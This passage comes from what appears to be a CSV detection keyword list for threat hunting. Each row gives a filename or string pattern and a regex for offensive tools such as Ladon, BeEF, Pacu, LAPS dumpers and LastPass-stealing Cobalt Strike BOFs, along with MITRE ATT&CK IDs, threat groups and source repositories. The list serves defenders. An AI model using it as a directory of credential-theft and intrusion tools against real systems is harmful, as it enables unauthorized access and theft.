Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon XshellPwd*",".{0,1000}Ladon\sXshellPwd.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon ZeroLogon*",".{0,1000}Ladon\sZeroLogon.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon40 BypassUAC*",".{0,1000}Ladon40\sBypassUAC.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon911*.ps1",".{0,1000}Ladon911.{0,1000}\.ps1","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon911.exe*",".{0,1000}Ladon911\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon911_*.rar*",".{0,1000}Ladon911_.{0,1000}\.rar.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*LadonExp.exe*",".{0,1000}LadonExp\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*LadonGUI.exe*",".{0,1000}LadonGUI\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*LadonLib.rar*",".{0,1000}LadonLib\.rar.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon-N20.exe*",".{0,1000}Ladon\-N20\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*Ladon-N40.exe*",".{0,1000}Ladon\-N40\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*LadonStudy.exe*",".{0,1000}LadonStudy\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Lalin.sh *",".{0,1000}Lalin\.sh\s.{0,1000}","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . install another and update to new","T1588","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/LALIN","1","0","N/A","N/A","4","354","164","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z" "*lallousz-x86@yahoo.com*",".{0,1000}lallousz\-x86\@yahoo\.com.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","1","N/A","8","1","47","7","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z" "*lambda__backdoor_new_sec_groups*",".{0,1000}lambda__backdoor_new_sec_groups.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*lan_fingerprint_common.*",".{0,1000}lan_fingerprint_common\..{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*lan_ping_sweep.json*",".{0,1000}lan_ping_sweep\.json.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*lan_sw_port_scan.json*",".{0,1000}lan_sw_port_scan\.json.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*lanjelot*",".{0,1000}lanjelot.{0,1000}","offensive_tool_keyword","Github Username","github username. creator of patator and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/lanjelot","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*LANs.py*",".{0,1000}LANs\.py.{0,1000}","offensive_tool_keyword","LANs.py","Automatically find the most active WLAN users then spy on one of them and/or inject arbitrary HTML/JS into pages they visit","T1538.001 - T1539.003 - T1040 - T1057 - T1134 - T1218 - T1053 - T1055 - T1059.001 - T1059.003","TA0007 - TA0006 - TA0003 - TA0002 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/DanMcInerney/LANs.py","1","1","N/A","N/A","10","2566","500","2021-07-31T21:33:37Z","2013-01-03T19:33:52Z" "*lanscan_arp.py*",".{0,1000}lanscan_arp\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1952","1596","2024-01-11T16:11:28Z","2021-01-07T16:11:52Z" "*laps_dump*",".{0,1000}laps_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*LapsAllowedAdminGroups.txt*",".{0,1000}LapsAllowedAdminGroups\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*LAPSDecrypt.*",".{0,1000}LAPSDecrypt\..{0,1000}","offensive_tool_keyword","LAPSDecrypt","Quick POC looking at how encryption works for LAPS (v2)","T1552.004","TA0003","N/A","N/A","Credential Access","https://gist.github.com/xpn/23dc5b6c260a7571763ca8ca745c32f4","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Lapsdump.cna*",".{0,1000}Lapsdump\.cna.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*Lapsdump.exe*",".{0,1000}Lapsdump\.exe.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*LAPSDumper-main*",".{0,1000}LAPSDumper\-main.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","1","N/A","10","3","238","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" "*LapsPasswords.txt*",".{0,1000}LapsPasswords\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*LAPSToolkit*",".{0,1000}LAPSToolkit.{0,1000}","offensive_tool_keyword","LAPSToolkit","Functions written in PowerShell that leverage PowerView to audit and attack Active Directory environments that have deployed Microsofts Local Administrator Password Solution (LAPS). It includes finding groups specifically delegated by sysadmins. finding users with All Extended Rights that can view passwords. and viewing all computers with LAPS enabled","T1087.001 - T1069 - T1069.003 - T1069.007 - T1069.002 - T1069.001","TA0007 - TA0008 - TA0009","N/A","N/A","Information Gathering","https://github.com/leoloobeek/LAPSToolkit","1","1","N/A","N/A","8","735","110","2018-01-31T14:45:35Z","2016-04-27T00:06:20Z" "*LAPSToolkit.ps1*",".{0,1000}LAPSToolkit\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*LaresLLC/SlinkyCat*",".{0,1000}LaresLLC\/SlinkyCat.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","1","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*LasCC/Hack-Tools*",".{0,1000}LasCC\/Hack\-Tools.{0,1000}","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5452","618","2024-02-24T00:10:34Z","2020-06-22T21:42:16Z" "*lastpass.x86*",".{0,1000}lastpass\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*lastpass/process_lp_files.py*",".{0,1000}lastpass\/process_lp_files\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*lastpass_sniffed_fmt_plug*",".{0,1000}lastpass_sniffed_fmt_plug.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*lastpass2john.py*",".{0,1000}lastpass2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Lateral/DCom.cs*",".{0,1000}Lateral\/DCom\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Lateral/PSExec.cs*",".{0,1000}Lateral\/PSExec\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Lateral/SMBClient.cs*",".{0,1000}Lateral\/SMBClient\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - 